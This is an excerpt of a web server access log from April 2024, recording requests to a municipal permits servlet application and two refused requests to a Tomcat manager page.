190.171.141.106 - - [18/Apr/2024:18:05:59 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 11379
190.171.141.106 - - [18/Apr/2024:18:06:18 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7188
190.171.141.106 - - [18/Apr/2024:18:06:26 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713474169110 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:18:06:26 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1032
190.171.141.106 - - [18/Apr/2024:18:06:26 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 11379
190.171.141.106 - - [18/Apr/2024:18:06:37 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7188
190.171.141.106 - - [18/Apr/2024:18:06:59 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376fed6ffcef179e269c2a815f8683d01d80dca96aced8075aa5788c1bfb3c7e1a326c89737914ad80162e02df97a8724bd,gx-no-cache=1713474201665 HTTP/1.1" 200 81
218.38.210.48 - tomcat [18/Apr/2024:18:07:04 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:18:07:14 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a3769fb0034d41844e4eccc69cf651ad629d2099af73e99c427bccef6e98fd49a37ef899e12d97c96f9b6fd70cb1efa11936,gx-no-cache=1713474216608 HTTP/1.1" 200 46
190.171.141.106 - - [18/Apr/2024:18:07:27 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713474229701 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:18:07:27 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1032
190.171.141.106 - - [18/Apr/2024:18:07:27 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 11644
190.171.141.106 - - [18/Apr/2024:18:07:49 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7188
218.38.210.48 - tomcat [18/Apr/2024:18:09:06 -0300] "GET /manager/html HTTP/1.1" 403 3196
